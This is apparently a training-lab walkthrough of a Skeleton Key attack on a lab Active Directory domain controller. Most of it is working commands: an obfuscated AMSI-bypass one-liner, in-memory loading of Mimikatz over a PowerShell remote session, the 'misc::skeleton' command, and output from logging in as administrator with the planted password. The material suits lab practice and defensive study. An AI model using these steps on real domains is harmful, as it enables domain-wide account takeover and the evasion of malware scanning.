Obj 10 Skeleton Key
Task - Use Domain Admin privileges obtained earlier to execute the Skeleton Key attack.
Use this attack with caution! It has the potential to break the DC!
We can simply use the following mimikatz command to execute the attack. Note that the command needs to be run with Domain Admin privileges. We could also use SafetyKatz or any other tool for the attack. First we need to bypass AMSI and load mimikatz in memory on the DC:
Create a new PSSession to the DC
PS C:\AD\Tools\Tools> $sess = New-PSSession dcorp-dc.dollarcorp.moneycorp.localEnter the session
PS C:\AD\Tools\Tools> Enter-PSSession -Session $sessRun the AMSI script
S`eT-It`em ( 'V'+'aR' + 'IA' + ('blE:1'+'q2') + ('uZ'+'x') ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( Get-varI`A`BLE ( ('1Q'+'2U') +'zX' ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em') ) )."g`etf`iElD"( ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )From our local machine we can load mimikatz into memory on the DC
Invoke-Command -FilePath C:\AD\Tools\Invoke-Mimikatz.ps1 -Session $sessNow we can enter back into the session and run the attack
PS C:\AD\Tools\Tools> Enter-PSSession -Session $sessSkeleton Key Attack
Invoke-Mimikatz -Command '"privilege::debug""misc::skeleton"'Now we can log on to any machine as any user unless the DC is restarted
Use mimikatz as the password
PS C:\AD\Tools> Enter-PSSession -ComputerName dcorp-dc.dollarcorp.moneycorp.local -Credential dcorp\administrator
[dcorp-dc]: PS C:\Users\Administrator\Documents> whoami
dcorp-dc\administrator
[dcorp-dc]: PS C:\Users\Administrator\Documents> exitLast updated